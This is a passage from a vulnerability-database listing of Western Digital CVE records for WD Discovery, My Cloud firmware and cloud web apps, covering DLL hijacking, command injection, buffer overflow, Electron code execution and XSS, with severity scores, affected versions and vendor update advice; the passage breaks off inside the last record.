Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
108 vulnerabilities by Western Digital
CVE-2025-30248 (GCVE-0-2025-30248)
Vulnerability from cvelistv5 – Published: 2026-01-26 22:47 – Updated: 2026-01-27 21:33
VLAI
Summary
DLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer's search path.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | WD Discovery |
Affected:
0 , < 5.3
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-30248",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-27T21:33:07.552813Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T21:33:27.911Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "WD Discovery",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.3",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, Security Researcher at GMO Cybersecurity by IERAE, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cstrong\u003eDLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer\u0027s search path.\u003cbr\u003e\u003cbr\u003e\u003c/strong\u003e\u003cbr\u003e"
}
],
"value": "DLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer\u0027s search path."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-26T23:03:27.954Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-25008-wd-discovery-desktop-app-version-5-3"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends users download the latest version from the WD Discovery Downloads page or by following the instructions on the \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://support-en.wd.com/app/answers/detailweb/a_id/20465\"\u003eWD Discovery: Online User Guide\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "Western Digital recommends users download the latest version from the WD Discovery Downloads page or by following the instructions on the WD Discovery: Online User Guide https://support-en.wd.com/app/answers/detailweb/a_id/20465"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2025-30248",
"datePublished": "2026-01-26T22:47:58.624Z",
"dateReserved": "2025-03-19T16:24:18.441Z",
"dateUpdated": "2026-01-27T21:33:27.911Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-30247 (GCVE-0-2025-30247)
Vulnerability from cvelistv5 – Published: 2025-09-29 21:07 – Updated: 2025-09-30 14:56
VLAI
Summary
An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud |
Affected:
0 , < 5.31.108
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-30247",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-30T14:56:27.048234Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-30T14:56:37.134Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "My Cloud",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.31.108",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Western Digital would like to thank w1th0ut for reporting this"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST.\u003cbr\u003e"
}
],
"value": "An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST."
}
],
"impacts": [
{
"descriptions": [
{
"lang": "en",
"value": "capec-137"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T21:07:20.786Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-25006-western-digital-my-cloud-os-5-firmware-5-31-108"
}
],
"source": {
"discovery": "EXTERNAL"
},
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification."
}
],
"value": "To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification."
}
],
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2025-30247",
"datePublished": "2025-09-29T21:07:20.786Z",
"dateReserved": "2025-03-19T16:24:18.441Z",
"dateUpdated": "2025-09-30T14:56:37.134Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22170 (GCVE-0-2024-22170)
Vulnerability from cvelistv5 – Published: 2024-09-27 17:06 – Updated: 2024-09-27 18:36
VLAI
Title
Unchecked buffer in Dynamic DNS client
Summary
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.This issue affects My Cloud: before 5.29.102.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.westerndigital.com/support/product-se… | vendor-advisory |
Impacted products
11 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud |
Affected:
0 , < 5.29.102
(custom)
|
|
| westerndigital | wd_cloud_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:wd_cloud_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_dl4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_dl2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_dl2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_mirror_g2_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_mirror_g2_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_pr4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_pr2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_ex4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex2_ultra_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:westerndigital:wd_cloud_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wd_cloud_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_dl4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_dl2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_dl2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_mirror_g2_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_mirror_g2_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_pr4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_pr2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex2_ultra_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22170",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-27T18:11:23.363352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T18:36:19.698Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "ddns-start",
"platforms": [
"Linux"
],
"product": "My Cloud",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.\u003cp\u003eThis issue affects My Cloud: before 5.29.102.\u003c/p\u003e"
}
],
"value": "Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.This issue affects My Cloud: before 5.29.102."
}
],
"impacts": [
{
"capecId": "CAPEC-100",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-100 Overflow Buffers"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 9.2,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T17:06:39.555Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24005-western-digital-my-cloud-os-5-firmware-5-29-102"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Unchecked buffer in Dynamic DNS client",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22170",
"datePublished": "2024-09-27T17:06:39.555Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-09-27T18:36:19.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22169 (GCVE-0-2024-22169)
Vulnerability from cvelistv5 – Published: 2024-08-02 18:31 – Updated: 2024-08-05 18:55
VLAI
Title
Misconfiguration in node.js causing a code execution in WD Discovery
Summary
WD Discovery
versions prior to 5.0.589 contain a misconfiguration in the Node.js environment
settings that could allow code execution by utilizing the 'ELECTRON_RUN_AS_NODE' environment variable.
Any malicious application operating with standard user permissions can exploit
this vulnerability, enabling code execution within WD Discovery application's
context. WD Discovery version 5.0.589 addresses this issue by disabling certain
features and fuses in Electron. The attack vector for this issue requires the victim to have the WD Discovery app installed on their device.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
1 reference
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | WD Discovery |
Affected:
0 , < 5.0.589
(custom)
|
|
| westerndigital | wd_discovery |
Affected:
0 , < 5.0.589
(custom)
cpe:2.3:a:westerndigital:wd_discovery:-:*:*:*:*:mac_os:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:westerndigital:wd_discovery:-:*:*:*:*:mac_os:*:*"
],
"defaultStatus": "unknown",
"product": "wd_discovery",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.0.589",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22169",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T18:52:00.824388Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-05T18:55:48.270Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "WD Discovery",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.0.589",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Western Digital would like to thank YoKo Kho, Fahad Alamri, and AbdulKarim from HakTrak Cybersecurity Squad for reporting this issue"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eWD Discovery\nversions prior to 5.0.589 contain a misconfiguration in the Node.js environment\nsettings that could allow code execution by utilizing the \u0027\u003cspan style=\"background-color: var(--wht);\"\u003eELECTRON_RUN_AS_NODE\u0027\u0026nbsp;\u003c/span\u003eenvironment variable.\nAny malicious application operating with standard user permissions can exploit\nthis vulnerability, enabling code execution within WD Discovery application\u0027s\ncontext. WD Discovery version 5.0.589 addresses this issue by disabling certain\nfeatures and fuses in Electron.\u0026nbsp;\u003cspan style=\"background-color: var(--wht);\"\u003eThe attack vector for this issue requires the victim to have the WD Discovery app installed on their\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003edevice.\u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003e\u003cbr\u003e\u003c/span\u003e\n\n\n\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "WD Discovery\nversions prior to 5.0.589 contain a misconfiguration in the Node.js environment\nsettings that could allow code execution by utilizing the \u0027ELECTRON_RUN_AS_NODE\u0027\u00a0environment variable.\nAny malicious application operating with standard user permissions can exploit\nthis vulnerability, enabling code execution within WD Discovery application\u0027s\ncontext. WD Discovery version 5.0.589 addresses this issue by disabling certain\nfeatures and fuses in Electron.\u00a0The attack vector for this issue requires the victim to have the WD Discovery app installed on their\u00a0device."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-02T18:31:11.324Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24004-wd-discovery-desktop-app-version-5-0-589"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers can\ndownload the latest version from the WD Discovery Downloads page or by\nfollowing the instructions on the \u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://support-en.wd.com/app/answers/detailweb/a_id/20465\"\u003eWD Discovery: Online User Guide\u003c/a\u003e\u003c/p\u003e\n\n\n\n\n\n\u003cbr\u003e"
}
],
"value": "Users can\ndownload the latest version from the WD Discovery Downloads page or by\nfollowing the instructions on the WD Discovery: Online User Guide https://support-en.wd.com/app/answers/detailweb/a_id/20465"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Misconfiguration in node.js causing a code execution in WD Discovery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22169",
"datePublished": "2024-08-02T18:31:11.324Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-08-05T18:55:48.270Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22168 (GCVE-0-2024-22168)
Vulnerability from cvelistv5 – Published: 2024-06-24 22:54 – Updated: 2024-08-01 22:35
VLAI
Title
Cross-Site Scripting (XSS) vulnerability on Western Digital My Cloud and SanDisk ibi Web Apps
Summary
A Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which could allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user’s browser session to carry out malicious activities.The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
Assigner
References
1 reference
Impacted products
8 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud Home web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| SanDisk | ibi web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| Western Digital | WD Cloud web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| Western Digital | My Cloud web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| western_digital | my_cloud_home_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:my_cloud_home_web_app:*:*:*:*:*:*:*:* |
|
| sandisk | ibi_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:sandisk:ibi_web_app:*:*:*:*:*:*:*:* |
|
| western_digital | wd_cloud_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:wd_cloud_web_app:*:*:*:*:*:*:*:* |
|
| western_digital | my_cloud_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:my_cloud_web_app:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:western_digital:my_cloud_home_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "my_cloud_home_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:sandisk:ibi_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "ibi_web_app",
"vendor": "sandisk",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:western_digital:wd_cloud_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "wd_cloud_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:western_digital:my_cloud_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "my_cloud_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22168",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T14:37:19.734049Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T14:51:55.016Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T22:35:34.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24003-western-digital-my-cloud-os-5-my-cloud-home-sandisk-ibi-and-wd-cloud-web-app-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "My Cloud Home web app",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "ibi web app",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "WD Cloud web app",
"vendor": "Western Digital",
"versions": [
{
